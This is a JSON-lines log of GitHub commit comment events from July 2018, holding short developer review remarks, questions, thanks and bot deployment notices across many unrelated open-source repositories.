{"id":"7977213540","type":"CommitCommentEvent","actor":{"login":"Natim"},"repo":{"name":"redgick/Redgick_Laboite"},"payload":{"comment":{"id":29735930,"position":null,"line":null,"path":null,"commit_id":"6030021e11c455ac0b97fd6a141a9bc8b686365d","created_at":"2018-07-17T14:46:07Z","updated_at":"2018-07-17T14:46:07Z","author_association":"NONE","body":":+1: thank you for taking the time."}},"created_at":"2018-07-17T14:46:07Z"}
{"id":"7977214596","type":"CommitCommentEvent","actor":{"login":"gabriellfresende"},"repo":{"name":"baianat/vee-validate"},"payload":{"comment":{"id":29735933,"position":null,"line":null,"path":null,"commit_id":"29b2877776ea7a7493be670f9dea7c98d31d3550","created_at":"2018-07-17T14:46:16Z","updated_at":"2018-07-17T14:46:16Z","author_association":"NONE","body":"Is this feature already available?"}},"created_at":"2018-07-17T14:46:16Z"}
{"id":"7977216090","type":"CommitCommentEvent","actor":{"login":"sr-murthy"},"repo":{"name":"OasisLMF/ZurichWorkshop2018"},"payload":{"comment":{"id":29735936,"position":null,"line":null,"path":null,"commit_id":"5308dec1db0d6e91287a792e7fd94310fe2fd3db","created_at":"2018-07-17T14:46:30Z","updated_at":"2018-07-17T14:46:30Z","author_association":"CONTRIBUTOR","body":"When you `pip install -e` from a Git branch in a virtual env. it is also a good idea to run\r\n\r\n    pip freeze | grep <package name>\r\n\r\nThis will display the most recent commit ID of the package source that was copied into the `src` virtual env. subdirectory. This commit ID should be the same as what you see in the Git log for that branch."}},"created_at":"2018-07-17T14:46:30Z"}
{"id":"7977216863","type":"CommitCommentEvent","actor":{"login":"idorrington92"},"repo":{"name":"gwastro/pycbc"},"payload":{"comment":{"id":29735939,"position":null,"line":null,"path":null,"commit_id":"1b1cc07c7332c6a7315d027af3d88457c5a53b65","created_at":"2018-07-17T14:46:36Z","updated_at":"2018-07-17T14:46:36Z","author_association":"NONE","body":"Done. Thanks\n\nOn Tue, Jul 17, 2018 at 3:36 PM Francesco Pannarale <\nnotifications@github.com> wrote:\n\n> Hi @idorrington92 <https://github.com/idorrington92>, could you also\n> update the arguments, so that null_min, null_grad, null_step replace\n> null_fraction? Thanks.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gwastro/pycbc/commit/1b1cc07c7332c6a7315d027af3d88457c5a53b65#commitcomment-29735764>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOF9ZMyfcRQ9U-QU2zBmmu9Oqu3q_JTeks5uHfaFgaJpZM4VS-Jo>\n> .\n>\n"}},"created_at":"2018-07-17T14:46:36Z"}
{"id":"7977217740","type":"CommitCommentEvent","actor":{"login":"coelckers"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29735941,"position":null,"line":null,"path":null,"commit_id":"7817e6a7b250378361e7abe191a81fe984a78aa2","created_at":"2018-07-17T14:46:44Z","updated_at":"2018-07-17T14:46:44Z","author_association":"OWNER","body":"You know, sometimes it is smarter to just keep quiet!\r\n"}},"created_at":"2018-07-17T14:46:44Z"}
{"id":"7977221807","type":"CommitCommentEvent","actor":{"login":"pannarale"},"repo":{"name":"gwastro/pycbc"},"payload":{"comment":{"id":29735950,"position":null,"line":null,"path":null,"commit_id":"1b1cc07c7332c6a7315d027af3d88457c5a53b65","created_at":"2018-07-17T14:47:19Z","updated_at":"2018-07-17T14:47:19Z","author_association":"CONTRIBUTOR","body":"Great, thanks!"}},"created_at":"2018-07-17T14:47:19Z"}
{"id":"7977222980","type":"CommitCommentEvent","actor":{"login":"Nakuro"},"repo":{"name":"LaravelRUS/SleepingOwlAdmin"},"payload":{"comment":{"id":29735953,"position":16,"line":33,"path":"src/Display/Column/Order.php","commit_id":"29826f445bd55d468195ca5d74f64289115d3abc","created_at":"2018-07-17T14:47:29Z","updated_at":"2018-07-17T14:47:29Z","author_association":"NONE","body":"Тут неправильно указан неймспейс, валятся все роуты. Вместо 'SleepingOwl\\Admin\\Http\\Controllers\\DisplayColumnController'\r\nДолжно   быть!\r\n'SleepingOwl\\Admin\\Http\\Controllers'"}},"created_at":"2018-07-17T14:47:29Z"}
{"id":"7977223628","type":"CommitCommentEvent","actor":{"login":"coelckers"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29735956,"position":null,"line":null,"path":null,"commit_id":"d12a1ed05e9221f2bfa855c77e59b705376a93b1","created_at":"2018-07-17T14:47:35Z","updated_at":"2018-07-17T14:47:35Z","author_association":"OWNER","body":"Yes, I have. The one on vulkan-tutorial is still better to start from, I think."}},"created_at":"2018-07-17T14:47:35Z"}
{"id":"7977232280","type":"CommitCommentEvent","actor":{"login":"zxytan"},"repo":{"name":"OasisLMF/ZurichWorkshop2018"},"payload":{"comment":{"id":29735975,"position":null,"line":null,"path":null,"commit_id":"5308dec1db0d6e91287a792e7fd94310fe2fd3db","created_at":"2018-07-17T14:48:51Z","updated_at":"2018-07-17T14:48:51Z","author_association":"CONTRIBUTOR","body":"Ah okay thanks! I think it might just be a temporary problem and it works fine with the `-e` flag when I install it directly in the command line, it's just not working with it in the requirements file"}},"created_at":"2018-07-17T14:48:51Z"}
{"id":"7977232360","type":"CommitCommentEvent","actor":{"login":"dmitrykurmanov"},"repo":{"name":"surveyjs/surveyjs"},"payload":{"comment":{"id":29735976,"position":null,"line":null,"path":null,"commit_id":"f2af3a10d3fcae4f506c7042fdc53ce55c5d8506","created_at":"2018-07-17T14:48:51Z","updated_at":"2018-07-17T14:48:51Z","author_association":"MEMBER","body":"@kamidev done!"}},"created_at":"2018-07-17T14:48:51Z"}
{"id":"7977235361","type":"CommitCommentEvent","actor":{"login":"VeeraWDC"},"repo":{"name":"VeeraWDC/test"},"payload":{"comment":{"id":29735983,"position":null,"line":null,"path":null,"commit_id":"c8bd93677850bef165c43c5b06aeb2b1e414accd","created_at":"2018-07-17T14:49:18Z","updated_at":"2018-07-17T14:49:18Z","author_association":"OWNER","body":"teting the commit"}},"created_at":"2018-07-17T14:49:18Z"}
{"id":"7977235605","type":"CommitCommentEvent","actor":{"login":"per1234"},"repo":{"name":"per1234/AH_28BYJ48"},"payload":{"comment":{"id":29735984,"position":null,"line":null,"path":null,"commit_id":"da06faadc4ccfe509ec9e18f5da4de88c39eca83","created_at":"2018-07-17T14:49:20Z","updated_at":"2018-07-17T14:49:20Z","author_association":"OWNER","body":"Each field in keywords.txt is separated by a **single** true tab. When you use multiple tabs you just create an empty field. With Arduino IDE 1.6.5 and newer, this causes the fallback `editor.function.style` theme setting to be used. That just happens to be the same setting used by `KEYWORD2` so you don't notice the incorrect keywords.txt format but it's still wrong and you will notice it if you use multiple tabs with other keywords identifiers.\r\n\r\nYou need to suppress your OCD need to have everything lined up all pretty and be compliant with the specification. keywords.txt is meant to be read by machines, not by humans.\r\n\r\nReference:\r\nhttps://github.com/arduino/Arduino/wiki/Arduino-IDE-1.5:-Library-specification#keywords"}},"created_at":"2018-07-17T14:49:20Z"}
{"id":"7977240717","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi3"},"payload":{"comment":{"id":29735994,"position":null,"line":null,"path":null,"commit_id":"222611579d912157d0c2f48219203b457d57b713","created_at":"2018-07-17T14:50:05Z","updated_at":"2018-07-17T14:50:05Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi3/193b4a08-e486-4c27-9fff-9b344fa9df20\n"}},"created_at":"2018-07-17T14:50:05Z"}
{"id":"7977243868","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29736004,"position":null,"line":null,"path":null,"commit_id":"f345cedca911524327e33640555340ddc5589bb4","created_at":"2018-07-17T14:50:31Z","updated_at":"2018-07-17T14:50:31Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-50](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-50).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-50-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T14:50:31Z"}
{"id":"7977267821","type":"CommitCommentEvent","actor":{"login":"pannarale"},"repo":{"name":"gwastro/pycbc"},"payload":{"comment":{"id":29736074,"position":null,"line":null,"path":null,"commit_id":"1b1cc07c7332c6a7315d027af3d88457c5a53b65","created_at":"2018-07-17T14:54:01Z","updated_at":"2018-07-17T14:54:01Z","author_association":"CONTRIBUTOR","body":"Sorry, lines https://github.com/gwastro/pycbc/blob/1b1cc07c7332c6a7315d027af3d88457c5a53b65/bin/pycbc_multi_inspiral#L124 and https://github.com/gwastro/pycbc/blob/1b1cc07c7332c6a7315d027af3d88457c5a53b65/bin/pycbc_multi_inspiral#L127 too. Cheers"}},"created_at":"2018-07-17T14:54:01Z"}
{"id":"7977269576","type":"CommitCommentEvent","actor":{"login":"jessejohnson-bnet"},"repo":{"name":"unosquare/passcore"},"payload":{"comment":{"id":29736078,"position":null,"line":null,"path":null,"commit_id":"a72a8e1a4d113743848bd542f669a65f39302da4","created_at":"2018-07-17T14:54:16Z","updated_at":"2018-07-17T14:54:16Z","author_association":"NONE","body":"Username regex doesn't allow for @domains"}},"created_at":"2018-07-17T14:54:16Z"}
{"id":"7977284883","type":"CommitCommentEvent","actor":{"login":"djfinch"},"repo":{"name":"djfinch/xmr-node-proxy"},"payload":{"comment":{"id":29736185,"position":null,"line":null,"path":null,"commit_id":"967d4450363dfb2d140d2150bc78e74382400806","created_at":"2018-07-17T14:56:32Z","updated_at":"2018-07-17T14:56:32Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/13107713/42825444-535a501a-89e2-11e8-9c6e-551e33b03a82.png)\r\n"}},"created_at":"2018-07-17T14:56:32Z"}
{"id":"7977290714","type":"CommitCommentEvent","actor":{"login":"itsmylife44"},"repo":{"name":"sulzbach/open-ethereum-pool"},"payload":{"comment":{"id":29736198,"position":null,"line":null,"path":null,"commit_id":"20a3135a78fbe501988264cdab14d0eaae7e7ed6","created_at":"2018-07-17T14:57:21Z","updated_at":"2018-07-17T14:57:21Z","author_association":"NONE","body":"if it working ?"}},"created_at":"2018-07-17T14:57:21Z"}
{"id":"7977293473","type":"CommitCommentEvent","actor":{"login":"suntong"},"repo":{"name":"Chatie/wechaty-getting-started"},"payload":{"comment":{"id":29736205,"position":31,"line":35,"path":"examples/starter-bot.js","commit_id":"feae020e4dd5d62baf4ea69fb99ba81efa36ef87","created_at":"2018-07-17T14:57:44Z","updated_at":"2018-07-17T14:57:44Z","author_association":"CONTRIBUTOR","body":"Why `function onMessage` changed from `async` to not doing so?"}},"created_at":"2018-07-17T14:57:44Z"}
{"id":"7977296636","type":"CommitCommentEvent","actor":{"login":"stefanofornari"},"repo":{"name":"beanshell/beanshell"},"payload":{"comment":{"id":29736210,"position":137,"line":295,"path":"src/main/java/bsh/Interpreter.java","commit_id":"9b4d2d746f0653be93dcbb1dbc8c4a53ba3c9430","created_at":"2018-07-17T14:58:10Z","updated_at":"2018-07-17T14:58:10Z","author_association":"CONTRIBUTOR","body":"Another use case is as follows (for example for bshconsole): \r\n- You subclass bsh.Interpreter in bsh\r\n- You now have access to console field (it should actually be private, but for now it is not)\r\n- Then:\r\n```\r\n  bsh.MyInterpreter i = new bsh.MyInterpreter(new MyConsole());\r\n  ...\r\n  MyConsole c = (MyConsole)i.console; // java.lang.ClassCastException !!!\r\n```"}},"created_at":"2018-07-17T14:58:10Z"}
{"id":"7977303316","type":"CommitCommentEvent","actor":{"login":"danzelenak-usgs"},"repo":{"name":"USGS-EROS/lcmap-tap"},"payload":{"comment":{"id":29736219,"position":null,"line":null,"path":null,"commit_id":"c42016a90abdfec29e6f42e0d5d7bdc35a5570d5","created_at":"2018-07-17T14:59:07Z","updated_at":"2018-07-17T14:59:07Z","author_association":"COLLABORATOR","body":"Just need to figure out how to customize the 'cfg' object here."}},"created_at":"2018-07-17T14:59:07Z"}
{"id":"7977303692","type":"CommitCommentEvent","actor":{"login":"prasad847"},"repo":{"name":"prasad847/Interview"},"payload":{"comment":{"id":29736224,"position":null,"line":null,"path":null,"commit_id":"4af48739617b5819024f2b00a97300197842344f","created_at":"2018-07-17T14:59:10Z","updated_at":"2018-07-17T14:59:10Z","author_association":"OWNER","body":"Poel Tech"}},"created_at":"2018-07-17T14:59:10Z"}
{"id":"7977305991","type":"CommitCommentEvent","actor":{"login":"f95244b"},"repo":{"name":"f95244b/Init"},"payload":{"comment":{"id":29736233,"position":null,"line":null,"path":null,"commit_id":"5ecd36ac78625387cdd5e915f29cce6cd0c6d784","created_at":"2018-07-17T14:59:29Z","updated_at":"2018-07-17T14:59:29Z","author_association":"OWNER","body":"ㅋㅋㅋ"}},"created_at":"2018-07-17T14:59:29Z"}
{"id":"7977308598","type":"CommitCommentEvent","actor":{"login":"cfinegan"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29736235,"position":73,"line":265,"path":"compile.rkt","commit_id":"e6d3881dc96c78fc8815c9a6f6f92da57223e360","created_at":"2018-07-17T14:59:51Z","updated_at":"2018-07-17T14:59:51Z","author_association":"COLLABORATOR","body":"Sigma is modified whenever compile-stmt finds a new private function, so I'm afraid of iterating through the hash table while it's being modified. "}},"created_at":"2018-07-17T14:59:51Z"}
{"id":"7977309774","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29736236,"position":null,"line":null,"path":null,"commit_id":"b0d68cb99ca276652e97c7f215b0dad6396922af","created_at":"2018-07-17T15:00:01Z","updated_at":"2018-07-17T15:00:01Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [masterblast](https://masterblast-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/b0d68cb99ca276652e97c7f215b0dad6396922af/.circleci/config.yml)\n"}},"created_at":"2018-07-17T15:00:01Z"}
{"id":"7977313072","type":"CommitCommentEvent","actor":{"login":"qliphy"},"repo":{"name":"ShevchenkoRostyslav/genproductions"},"payload":{"comment":{"id":29736254,"position":null,"line":null,"path":null,"commit_id":"d9dfa18799f81bbc8cbf8cec7d059e5888b9143e","created_at":"2018-07-17T15:00:28Z","updated_at":"2018-07-17T15:00:28Z","author_association":"NONE","body":"Why do you have this line?:  https://github.com/ShevchenkoRostyslav/genproductions/blob/d9dfa18799f81bbc8cbf8cec7d059e5888b9143e/bin/MadGraph5_aMCatNLO/cards/production/2017/13TeV/Higgs/ggh012j_HPt-250ToInf_5f_NLO_FXFX_MH125/ggh012j_HPt-250ToInf_5f_NLO_FXFX_MH125_cuts.f#L402"}},"created_at":"2018-07-17T15:00:28Z"}
{"id":"7977313798","type":"CommitCommentEvent","actor":{"login":"truongnmt"},"repo":{"name":"juanchosaravia/KedditBySteps"},"payload":{"comment":{"id":29736256,"position":78,"line":78,"path":"app/src/main/res/layout/news_item.xml","commit_id":"f52a80c6d7ec00ba58a44c14ccc57a5d79ad03ba","created_at":"2018-07-17T15:00:33Z","updated_at":"2018-07-17T15:00:33Z","author_association":"NONE","body":"Add empty line here"}},"created_at":"2018-07-17T15:00:33Z"}
{"id":"7977314523","type":"CommitCommentEvent","actor":{"login":"rachinin1"},"repo":{"name":"ultrakiwi99/pulstime.ru"},"payload":{"comment":{"id":29736258,"position":null,"line":null,"path":null,"commit_id":"acf766eb1b896a39bcaf8eaad37783bfc54747ce","created_at":"2018-07-17T15:00:39Z","updated_at":"2018-07-17T15:00:39Z","author_association":"COLLABORATOR","body":"@ultrakiwi99 посмотри пожалуйста выравнивание кнопки \"в каталог\" и логотипа polar на банере, у меня не вышло сделать красиво"}},"created_at":"2018-07-17T15:00:39Z"}
{"id":"7977315997","type":"CommitCommentEvent","actor":{"login":"qliphy"},"repo":{"name":"ShevchenkoRostyslav/genproductions"},"payload":{"comment":{"id":29736260,"position":null,"line":null,"path":null,"commit_id":"d9dfa18799f81bbc8cbf8cec7d059e5888b9143e","created_at":"2018-07-17T15:00:51Z","updated_at":"2018-07-17T15:00:51Z","author_association":"NONE","body":"Do you also need to rename customizecards.dat?"}},"created_at":"2018-07-17T15:00:51Z"}
{"id":"7977316378","type":"CommitCommentEvent","actor":{"login":"Perlkonig"},"repo":{"name":"Perlkonig/grav-theme-knowledge-base"},"payload":{"comment":{"id":29736262,"position":null,"line":null,"path":null,"commit_id":"2c3cfc457ffcb077c7cf6ae5b7cef9fe24fbe534","created_at":"2018-07-17T15:00:55Z","updated_at":"2018-07-17T15:00:55Z","author_association":"OWNER","body":"I don't know. Is that possible? In this case, it's my own fault for not testing the theme after updating the plugin.  If you know how to do this, please let me know. Otherwise I'll have to do some reading later this week."}},"created_at":"2018-07-17T15:00:55Z"}
{"id":"7977325773","type":"CommitCommentEvent","actor":{"login":"gabizou"},"repo":{"name":"SpongePowered/SpongeForge"},"payload":{"comment":{"id":29736286,"position":50,"line":50,"path":"src/main/java/org/spongepowered/mod/mixin/optimization/threadchecks/MixinSpongeImplHooks_ThreadChecks.java","commit_id":"e37fa119fa73a9a2819ad68a0d9ff8bb436f0459","created_at":"2018-07-17T15:02:17Z","updated_at":"2018-07-17T15:02:17Z","author_association":"MEMBER","body":"I'm fairly sure it will work. I'm going to do some testing right now to verify."}},"created_at":"2018-07-17T15:02:17Z"}
{"id":"7977327518","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/ReentrantIssue"},"payload":{"comment":{"id":29736292,"position":45,"line":45,"path":"contracts/HoneyProcessor.sol","commit_id":"44a5860753abe842e0029718c4e51376598de087","created_at":"2018-07-17T15:02:33Z","updated_at":"2018-07-17T15:02:33Z","author_association":"OWNER","body":"Ok. Got it. So if the balance after attack is not greater than before attack than the complete transaction will be rolled back there by making sure that we are not losing any funds. Thanks Xavier. This has been a GREAT learning experience about Re-entrant issue 👍 "}},"created_at":"2018-07-17T15:02:33Z"}
{"id":"7977327553","type":"CommitCommentEvent","actor":{"login":"danzelenak-usgs"},"repo":{"name":"USGS-EROS/lcmap-tap"},"payload":{"comment":{"id":29736294,"position":null,"line":null,"path":null,"commit_id":"8726377e7a21a3ee2a35c09a54215eb7173dd96f","created_at":"2018-07-17T15:02:33Z","updated_at":"2018-07-17T15:02:33Z","author_association":"COLLABORATOR","body":"Including files used to generate the Leaflet reference map."}},"created_at":"2018-07-17T15:02:33Z"}
{"id":"7977339465","type":"CommitCommentEvent","actor":{"login":"kamuran93"},"repo":{"name":"saitho/ng2-smart-table"},"payload":{"comment":{"id":29736326,"position":null,"line":null,"path":null,"commit_id":"a8312a8d50f9d6e27777553c4539f4719fecc550","created_at":"2018-07-17T15:04:20Z","updated_at":"2018-07-17T15:04:20Z","author_association":"NONE","body":"hi saitho , ı m new at angular  ım trying to. use your date picker filter.  via clone your  ng2-smart. folder from src. and change with my ng2-smart folder.  and make changes. my component  like your advancedExamplecomponent. When ı  build my project  ı GET \" ERROR in ./node_modules/ng2-smart-table/components/filter/filter-types/date-filter.component.ts\r\nModule build failed: Error: /Users/ideaktifmac/Projects/IdeaproWeb/node_modules/ng2-smart-table/components/filter/filter-types/date-filter.component.ts is missing from the TypeScript compilation. Please make sure it is in your tsconfig via the 'files' or 'include' property. \" ı tried what ever come  to mind all day.  Please give me some advices "}},"created_at":"2018-07-17T15:04:20Z"}
{"id":"7977339704","type":"CommitCommentEvent","actor":{"login":"sesam"},"repo":{"name":"puma/puma-dev"},"payload":{"comment":{"id":29736328,"position":24,"line":36,"path":"README.md","commit_id":"ef0e8a14acef9688ccf96d4c2e7ead56b81ec339","created_at":"2018-07-17T15:04:22Z","updated_at":"2018-07-17T15:04:22Z","author_association":"CONTRIBUTOR","body":"(thanks for merging, and sorry for the typo)"}},"created_at":"2018-07-17T15:04:22Z"}
{"id":"7977340202","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29736330,"position":null,"line":null,"path":null,"commit_id":"2290173d00b204f3efdb80aa9a5e4145c7eb8ce8","created_at":"2018-07-17T15:04:27Z","updated_at":"2018-07-17T15:04:27Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#ci-498](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#ci-498).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-498-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-17T15:04:27Z"}
{"id":"7977340858","type":"CommitCommentEvent","actor":{"login":"CristianRosario"},"repo":{"name":"1806-jun25-net/Rosario_Acevedo_Project1"},"payload":{"comment":{"id":29736332,"position":null,"line":null,"path":null,"commit_id":"c9b666beffa2f212c1f0861677122e237f1fc739","created_at":"2018-07-17T15:04:33Z","updated_at":"2018-07-17T15:04:33Z","author_association":"COLLABORATOR","body":"Update"}},"created_at":"2018-07-17T15:04:33Z"}
{"id":"7977341575","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"Infernus101/ProfileUI"},"payload":{"comment":{"id":29736335,"position":null,"line":null,"path":null,"commit_id":"2a3afec4991a61f1489fc0668645fb44119defb9","created_at":"2018-07-17T15:04:39Z","updated_at":"2018-07-17T15:04:39Z","author_association":"NONE","body":"Dear @Infernus101:\nI am writing to remind you that Poggit does not accept non-released APIs. API 4.0.0 has not been released yet, so Poggit will automatically remove it from your plugin.yml.\n\nI will not reject this update because of this automatically removed API version, and the rest of the changes in this update look OK. As a result, Your release will still be approved, but please be reminded that your plugin's download from Poggit **will not display as supporting 4.0.0**.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-17T15:04:39Z"}
{"id":"7977343265","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29736345,"position":5,"line":43,"path":"languagetool-gui-commons/src/main/java/org/languagetool/gui/Configuration.java","commit_id":"96aa70a5111715ce848f9d2567b949f869c806fa","created_at":"2018-07-17T15:04:55Z","updated_at":"2018-07-17T15:04:55Z","author_association":"MEMBER","body":"I suggest you also check the command line version. The stand-alone version might actually waste quite some time for rendering. I just tested a 55K German (de-DE) text on the command line:\r\n* all rules: 17 seconds\r\n* text-level rules only: 2.5 seconds\r\n\r\nI tested this with a hack, namely just commenting out `ruleMatches.addAll(getOtherRuleMatches());` in `JLanguageTool`. So maybe I'm missing something, but checking a text with text-level rules only should be really fast."}},"created_at":"2018-07-17T15:04:55Z"}
{"id":"7977352067","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29736353,"position":null,"line":null,"path":null,"commit_id":"4b5bf5ed0e4b0e09804b668ec2a6d4187f1ab63a","created_at":"2018-07-17T15:06:15Z","updated_at":"2018-07-17T15:06:15Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-296](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-296).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-296-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-17T15:06:15Z"}
{"id":"7977355675","type":"CommitCommentEvent","actor":{"login":"stefanofornari"},"repo":{"name":"beanshell/beanshell"},"payload":{"comment":{"id":29736363,"position":356,"line":1250,"path":"src/main/java/bsh/Interpreter.java","commit_id":"9b4d2d746f0653be93dcbb1dbc8c4a53ba3c9430","created_at":"2018-07-17T15:06:49Z","updated_at":"2018-07-17T15:06:49Z","author_association":"CONTRIBUTOR","body":"this is probably intended - any reason why not use System.lineSeparator() ?"}},"created_at":"2018-07-17T15:06:49Z"}
{"id":"7977357044","type":"CommitCommentEvent","actor":{"login":"davelandry"},"repo":{"name":"d3plus/d3plus-hierarchy"},"payload":{"comment":{"id":29736367,"position":null,"line":null,"path":null,"commit_id":"7a641ea3a3ffb5beac7a8c5d93cfd584b74800cc","created_at":"2018-07-17T15:07:01Z","updated_at":"2018-07-17T15:07:01Z","author_association":"MEMBER","body":"@cnavarreteliz \"minor optimizations inside Pack.js\" does not fit our commit message standards. moving forward, please separate these things out to individual commits like this:\r\n* adds sort method to Pack\r\n* removes function detection in layoutPadding"}},"created_at":"2018-07-17T15:07:01Z"}
{"id":"7977362354","type":"CommitCommentEvent","actor":{"login":"chaals"},"repo":{"name":"w3c/html"},"payload":{"comment":{"id":29736377,"position":17,"line":10688,"path":"sections/semantics-forms.include","commit_id":"17e989a5e49df43ef3470e0707b93a357119dfc1","created_at":"2018-07-17T15:07:49Z","updated_at":"2018-07-17T15:07:49Z","author_association":"COLLABORATOR","body":"This seems to authorise doing so. I think I would say \r\n> disguised, there is a risk that personal data is entered or changed using... managers, without the user being aware."}},"created_at":"2018-07-17T15:07:49Z"}
{"id":"7977365249","type":"CommitCommentEvent","actor":{"login":"cfinegan"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29736383,"position":58,"line":256,"path":"compile.rkt","commit_id":"e6d3881dc96c78fc8815c9a6f6f92da57223e360","created_at":"2018-07-17T15:08:11Z","updated_at":"2018-07-17T15:08:11Z","author_association":"COLLABORATOR","body":"If two identical public functions are declared with different names, then the initial construction of Sigma will randomly discard one of the names. I.e, if `n->f` is `(hash \"foo\" some-fun \"bar\" some-fun)`, then the initial value of Sigma may be `(hash some-fun \"bar\")`. Maybe this doesn't matter because `foo` and `bar` are identical anyway, but outside callers might expect `foo` to be compiled regardless."}},"created_at":"2018-07-17T15:08:11Z"}
{"id":"7977371881","type":"CommitCommentEvent","actor":{"login":"AzGilrock"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29736396,"position":null,"line":null,"path":null,"commit_id":"3563739f3f7625e3e0979a9bb507ba17b583c854","created_at":"2018-07-17T15:09:12Z","updated_at":"2018-07-17T15:09:12Z","author_association":"COLLABORATOR","body":"Will be nice when we finally merge in my branch where things like this were already fixed.  Pretty sure I did it without all these SetFromXml calls.  If you set a breakpoint on the InitModel function for a model I think you will find we call it way too many times."}},"created_at":"2018-07-17T15:09:12Z"}
{"id":"7977372186","type":"CommitCommentEvent","actor":{"login":"rachinin1"},"repo":{"name":"ultrakiwi99/pulstime.ru"},"payload":{"comment":{"id":29736399,"position":null,"line":null,"path":null,"commit_id":"388074dfe20a39a8a5e49770b066abbf140ec9db","created_at":"2018-07-17T15:09:15Z","updated_at":"2018-07-17T15:09:15Z","author_association":"COLLABORATOR","body":"@ultrakiwi99 посмотри своим взглядом, как правильно выровнять по высоте содержимое в блоке \"наши преимущества\""}},"created_at":"2018-07-17T15:09:15Z"}
{"id":"7977378373","type":"CommitCommentEvent","actor":{"login":"rowlandda"},"repo":{"name":"rowlandda/planets"},"payload":{"comment":{"id":29736411,"position":null,"line":null,"path":null,"commit_id":"02f961ece0c189a9960ce5268f21df7ca66483de","created_at":"2018-07-17T15:10:13Z","updated_at":"2018-07-17T15:10:13Z","author_association":"OWNER","body":"This is a dummy binary made with `head --bytes 1024 /dev/urandom`"}},"created_at":"2018-07-17T15:10:13Z"}
{"id":"7977384751","type":"CommitCommentEvent","actor":{"login":"digodk"},"repo":{"name":"BitsPleaseBr/bits-please"},"payload":{"comment":{"id":29736417,"position":null,"line":null,"path":null,"commit_id":"8409a2f3f62915293313f99ae630b65f9766014b","created_at":"2018-07-17T15:11:08Z","updated_at":"2018-07-17T15:11:08Z","author_association":"COLLABORATOR","body":"Acho que já pode deixar o pull request aberto por enquanto"}},"created_at":"2018-07-17T15:11:08Z"}
{"id":"7977385741","type":"CommitCommentEvent","actor":{"login":"rowlandda"},"repo":{"name":"rowlandda/planets"},"payload":{"comment":{"id":29736421,"position":null,"line":null,"path":null,"commit_id":"f34ff2ca58e60db8b8d047082470160a1efc1755","created_at":"2018-07-17T15:11:17Z","updated_at":"2018-07-17T15:11:17Z","author_association":"OWNER","body":"This is a dummy binary made with `head --bytes 1024 /dev/urandom`"}},"created_at":"2018-07-17T15:11:17Z"}
{"id":"7977387533","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29736434,"position":null,"line":null,"path":null,"commit_id":"d47961fe7c52b7814280d2c4ca62bd92e7ce70c9","created_at":"2018-07-17T15:11:32Z","updated_at":"2018-07-17T15:11:32Z","author_association":"MEMBER","body":"oooof sorry\r\n"}},"created_at":"2018-07-17T15:11:32Z"}
{"id":"7977387790","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29736435,"position":24,"line":24,"path":"Lession1/3.rb","commit_id":"7735fe369b63583167a2691d37b5e2972a560462","created_at":"2018-07-17T15:11:34Z","updated_at":"2018-07-17T15:11:34Z","author_association":"NONE","body":"не имеет смысла писать подобные проверки:\r\n```ruby\r\nif something == true\r\n  do_something\r\nelse\r\n  do_something_else\r\nend\r\n```\r\n\r\nкогда оператору `if` передается аргумент, то этот аргумент автоматически приводится к булеву значению, потому что именно булево значение должно являться аргументом этого оператора (он проверяет условие \"если правда\")\r\n\r\nдругими словами первую строчку правильно написать вот так:\r\n```ruby\r\nif something\r\n```\r\nэтого достаточно, стравнение с `true` излишне\r\n\r\n"}},"created_at":"2018-07-17T15:11:34Z"}
